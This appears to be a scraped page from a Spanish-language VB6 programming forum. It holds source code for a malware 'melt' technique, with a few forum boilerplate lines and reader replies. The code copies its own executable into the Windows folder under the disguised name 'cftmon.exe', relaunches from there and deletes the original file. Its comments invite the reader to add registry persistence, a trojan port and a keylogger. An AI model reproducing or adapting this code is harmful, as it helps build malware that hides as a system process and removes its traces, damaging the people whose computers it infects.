a mi no me da error nunca ...
pero podrías explicar el código???, los noobs en vb6 te lo agradeceriamos
pero podrías explicar el código???, los noobs en vb6 te lo agradeceriamos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú Err.Raise Err.Number, "CSocket.SendData", Err.Description
Dentro del Form1, (form principal)
call Main 'para llamar a la funcion
'i el resto de mi code, que no pongo, para que no se alarge tanto
Dentro de Module1
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Sub Main()
'Obtenemos el nombre de nuestro ejecutable
MyName = App.EXEName
'Comprobamos si nos llamamos CTFMON
If LCase(App.EXEName) = "cftmon" Then
Call Execute
Else
Call MeltFile
End If
End Sub
Function Execute()
'Función que se encarga de borrar el archivo original a partir
'de su ruta. Al terminar ejecuta el PayLoad
On Error Resume Next
If Not IsEmpty(Command$) Then 'Verificamos si tenemos algo en los argumentos
While Dir(Command$) <> "" 'Comprobamos si existe el archivo que tenemos en los argumentos
Kill Command$ ' Si existe... lo borramos
DoEvents ' Esperamos un poco
Wend 'Bucle
End If
Call PayLoad 'Ejecutamos el resto del Malware
End Function
Function MeltFile()
'Función que copia el propio Malware en la carpeta TEMP del sistema
'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
'argumento su propia ruta.
Dim MySelf As String
MySelf = String$(255, Chr$(0))
GetModuleFileName 0, MySelf, Len(MySelf) 'Devuele la ruta correcta de tu aplicación
FileCopy MySelf, Environ("windir") & "\cftmon.exe" copia a windows en ves de Temp
DoEvents 'Esperamos...
Shell Environ("windir") & "\cftmon.exe " & MySelf 'Ejecutamos "windows\cftmon.exe" + Ruta de tu aplicación
End 'Finalizamos (importante! xD)
End Function
Function PayLoad()
'Aqui incluimos el resto de código de tu Malware...
'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
'activar el keylogger o lo que quieras programar :P
MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
End
End Function
GetModuleFileName